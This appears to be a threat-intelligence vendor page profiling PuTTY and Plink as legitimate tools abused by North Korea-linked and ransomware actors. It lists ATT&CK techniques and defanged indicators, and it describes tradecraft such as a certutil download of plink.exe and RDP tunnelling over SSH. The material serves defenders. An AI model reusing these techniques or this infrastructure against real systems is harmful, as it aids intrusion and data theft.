PuTTY
PuTTY is a publicly available SSH client and related remote access utility suite that includes components such as Plink (PuTTY Link). In the provided reporting, it appears primarily as a legitimate dual-use tool abused by multiple threat actors rather than as a distinct malware family. North Korea-linked actors including Stonefly/Andariel/Onyx Sleet and Moonstone Sleet have used PuTTY or trojanized PuTTY in operations. Microsoft reported that in early August 2023 Moonstone Sleet delivered a trojanized version of PuTTY via LinkedIn, Telegram, and developer freelancing platforms; the lure often used a ZIP containing putty.exe and url.txt with an IP address and password, and entering those values caused the trojanized binary to decrypt and execute an embedded payload, initiating a multi-stage chain involving SplitLoader and follow-on loaders. Separately, reporting on Andariel states the group has used PuTTY and WinSCP to exfiltrate data to North Korea-controlled servers via FTP and other protocols, and Symantec observed Stonefly using PuTTY and Plink for SSH connectivity during financially motivated intrusions. Arctic Wolf also documented threat actors exploiting Qlik Sense to deploy Cactus ransomware tooling, including downloading a Plink binary renamed to putty.exe, using it to establish an RDP tunnel over SSH on port 443 with remote forwarding to 127.0.0.1:3389 via 45.61.147[.]176:50400; related infrastructure and payload locations included zohoservice[.]net, 216.107.136[.]46, and 144.172.122[.]30, and Arctic Wolf provided SHA-256 828e81aa16b2851561fff6d3127663ea2d1d68571f06cbd732fdf5672086924d for the observed Plink sample. Cisco Talos also noted PuTTY was used for credential exfiltration in the first wave of the 2023 ToyMaker/UNC961 campaign before a later handoff to the Cactus ransomware group.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
3 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Differences in TTPs... operators conducting initial access relied on PuTTY for credential exfiltration...
Microsoft observed Moonstone Sleet delivering a trojanized version of PuTTY
Techniques & procedures
16 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
3 techniquesT1583 Acquire Infrastructure QuadSwitcher acquired infrastructure to host their tooling.
The content repeatedly states that threat actors 'obtained,' 'acquired,' or 'used' publicly available, open-source, legitimate, or modified tools such as Mimikatz, Cobalt Strike, PsExec, Empire, Impacket, and many others.
T1608.002 Stage Capabilities: Upload Tool The Play gang uploaded the third-party tools it uses to a dedicated server to be used during intrusions.
Persistence
1 techniqueStealth
2 techniquesIn the case of the DLL, the executable is a PuTTY client with a valid code-signing certificate. The binary distributed via JavaScript is an Inno Setup installer for an Electron application.
At the end of August 2024, QuadSwitcher compromised a technology company in Western Europe, downloading PuTTY from http://130.185.75[.]198:8000/plink.exe using certutil.exe ... The threat actor also downloaded MeshAgent ... also via certutil.exe.
Defense Impairment
1 techniqueCredential Access
1 techniqueCredential theft is a primary objective. The group uses various techniques to perform this core function, including dumping the Local Security Authority Subsystem Service (LSASS) memory and exfiltrating the NTDS.dit Active Directory database, and capturing credentials stored in browsers and SSH clients like PuTTY and OpenSSH.
Lateral Movement
2 techniques"The threat actor used RDP with valid account credentials for lateral movement..."
The threat actor used Plink and PuTTY for lateral movement. Artifacts of Plink were used for encrypted sessions in the system registry hive.
Command and Control
4 techniquesT1071 Application Layer Protocol In Play intrusions, payloads are retrieved via HTTP.
MirrorFace has used the the PuTTY suite Secure Copy Protocol (SCP) client for file transfer.
INC Ransom has used AnyDesk and PuTTY on compromised systems.
“They also use tunneling tools such as 3Proxy, PLINK, and Stunnel... [T1090, T1071].”
Exfiltration
3 techniquesADVSTORESHELL exfiltrates data over the same channel used for C2... Agrius exfiltrated staged data using tools such as Putty and WinSCP, communicating with command and control servers... numerous malware and groups sent victim data, files, credentials, or host information over existing C2 channels.
“...used the utilities PuTTY and WinSCP to exfiltrate data... via File Transfer Protocol (FTP) and other protocols [T1048].”
"Cloud storage misuse: Operators have logged into cloud storage services such as MEGA directly from compromised networks, uploading data with tools like WinSCP and PuTTY."
IOCs tracked for this family
3 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Recent activity
6 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Legitimate SSH/Telnet client abused during intrusions for interactive access and (in this case) credential exfiltration workflows.
SSH client abused for remote access and management of compromised systems during the intrusions.
Legitimate SSH client used for remote access/administration; commonly abused by threat actors for interactive access.
Legitimate SSH/terminal client used as a trojanized initial access vector; decrypts an embedded payload when the victim enters provided IP/password, initiating a staged loader chain (including SplitLoader).
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.